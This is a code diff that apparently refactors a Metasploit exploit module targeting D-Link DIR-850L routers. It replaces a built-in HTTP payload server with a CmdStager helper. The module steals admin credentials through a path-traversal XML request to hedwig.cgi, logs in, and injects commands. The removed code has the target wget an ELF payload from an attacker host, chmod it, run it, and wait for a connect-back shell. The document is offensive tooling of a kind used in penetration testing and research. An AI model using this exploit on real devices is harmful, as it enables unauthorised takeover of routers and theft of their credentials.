cmdstager build

Removes the need for HTTP Server, utilizes helper CmdStager, reduces module size.

Author: Austin

modules/exploits/linux/http/dlink_850l_unauth_exec.rb

@@ -9,10 +9,8 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::Remote::EXE
   include Msf::Auxiliary::Report
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -30,7 +28,6 @@ def initialize(info = {})
         ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
       ],
       'DisclosureDate' => 'Aug 9 2017',
-      'Stance' => Msf::Exploit::Stance::Aggressive,
       'License' => MSF_LICENSE,
       'Platform' => 'linux',
       'Arch' => ARCH_MIPSBE,
@@ -44,14 +41,6 @@ def initialize(info = {})
       },
       'Targets' => [[ 'Automatic', {} ]],
     ))
-
-    register_options(
-      [
-        OptAddress.new('DOWNHOST', [ false, 'An alternative host to requst the ARMLE payload from' ]),
-        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
-        OptInt.new('HTTP_DELAY', [ true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
-        OptInt.new('CONNECTBACK_DELAY', [ true, 'Time to wait for shell to connect back to listener', 10])
-      ])
   end
 
   def check
@@ -102,6 +91,9 @@ def report_cred(opts)
     create_credential_login(login_data)
   end
 
+
+  # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
+  # should write an auxiliary module to-do -> WRITE AUXILIARY
   def retrieve_creds
     begin
       xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
@@ -110,7 +102,6 @@ def retrieve_creds
       xml << "  <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
       xml << "</module>\r\n"
       xml << "</postxml>"
-      uid = rand_text_alpha_lower(8)
       res = send_request_cgi({
         'uri' => '/hedwig.cgi',
         'method' => 'POST',
@@ -120,16 +111,20 @@ def retrieve_creds
           'Accept' => '*/*'
         },
         'ctype' => 'text/xml',
-        'cookie' => "uid=#{uid}",
+        'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
         'data' => xml,
       })
-      parse = res.get_xml_document
-      username = parse.at('//name').text
-      password = parse.at('//password').text
-      vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
-      loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
-      print_good("#{peer} - Downloaded credentials to #{loot}")
-      return username, password
+      if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
+        parse = res.get_xml_document
+        username = parse.at('//name').text
+        password = parse.at('//password').text
+        vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
+        loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
+        print_good("#{peer} - Downloaded credentials to #{loot}")
+        return username, password
+      else
+        fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
+      end
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
     end
@@ -166,8 +161,8 @@ def login(username, password)
     end
   end
 
-  def execute(cmd, username, password)
-    uid = login(username, password)
+  def execute_command(cmd, opts)
+    uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
     payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
     payload << "<postxml>\r\n"
     payload << "<module>\r\n"
@@ -225,138 +220,10 @@ def exploit
     #
     # Information Retrieval, obtains creds and logs in
     #
-    username, password = retrieve_creds
-
-    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
-
-    @pl = generate_payload_exe
-    @elf_sent = false
-
-    # HTTP Server
-    resource_uri = '/' + downfile
-    if (datastore['DOWNHOST'])
-      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
-    else
-      # no ssl...
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end
-
-      #
-      # Service URL
-      #
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = datastore['SRVHOST']
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-
-      #
-      # Retrieve UID from target after authentication
-      #
-
-      print_status("#{peer} - Starting up web service #{service_url}")
-
-      start_service({'Uri' => {
-        'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
-        },
-        'Path' => resource_uri
-      }})
-
-      datastore['SSL'] = true if ssl_restore
-    end
-
-
-    #
-    # Requests target to download payload
-    #
-    print_status("#{peer} - Asking target to request to download #{service_url}")
-
-    filename = rand_text_alpha_lower(8)
-
-    cmd = "wget #{service_url} -O /tmp/#{filename}"
-    res = execute(cmd, username, password)
-    if (!res)
-      fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload")
-    end
-
-    if (datastore['DOWNHOST'])
-      print_status("#{peer} - Giving #{datastore['HTTP_DELAY']} seconds to the device to download the payload")
-      select(nil, nil, nil, datastore['HTTP_DELAY'])
-    else
-      wait_for_linux_payload
-    end
-    register_file_for_cleanup("/tmp/#{filename}")
-
-
-    #
-    # Sets binary permissions to executable
-    #
-    cmd = "chmod 777 /tmp/#{filename}"
-    print_status("#{peer} - Requesting device to chmod #{downfile}")
-    res = execute(cmd, username, password)
-    if (!res)
-      fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload") # fannccyyy
-    end
-
-    #
-    # Executes binary on target
-    #
-    cmd = "/tmp/#{filename}"
-    print_status("#{peer} - Requesting device to execute #{downfile}")
-    res = execute(cmd, username, password)
-    if (!res)
-      fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload")
-    end
-    wait_for_connect
-  end
-
-
-  #
-  # Handler for web server payload delivery
-  #
-  def on_request_uri(cli, request)
-    if (not @pl)
-      print_error("#{peer} - A request came in, but the payload was not ready")
-      return
-    end
-    print_status("#{peer} - Sending payload to the server...")
-    @elf_sent = true,
-    send_response(cli, @pl)
-  end
-
-  #
-  # Waits for shell to connect back to us, otherwise server stops and nothing is returned
-  #
-  def wait_for_connect
-    print_status("#{peer} - Waiting #{datastore['CONNECTBACK_DELAY'].to_s} seconds for shell to connect back to us...")
-    waited = 0
-    while (@elf_sent)
-      select(nil, nil, nil, 1)
-      waited += 1
-      if (waited > datastore['CONNECTBACK_DELAY'])
-        fail_with(Failure::Unknown, "#{peer} - Shell never connected to us!, disconnect?")
-      end
-    end
-  end
-
-  #
-  # Waits for target to request payload
-  #
-  def wait_for_linux_payload
-    print_status("#{peer} - Waiting for target to request the ELF payload...")
-
-    waited = 0
-    while (not @elf_sent)
-      select(nil, nil, nil, 1)
-      waited += 1
-      if (waited > datastore['HTTP_DELAY'])
-        fail_with(Failure::Unknown, "#{peer} - Target didn't request the ELF payload - Maybe it can't connect back?") # ;-;
-      end
-    end
+    @username, @password = retrieve_creds
+    execute_cmdstager(
+      :flavor => :wget,
+      :linemax => 200
+    )
   end
 end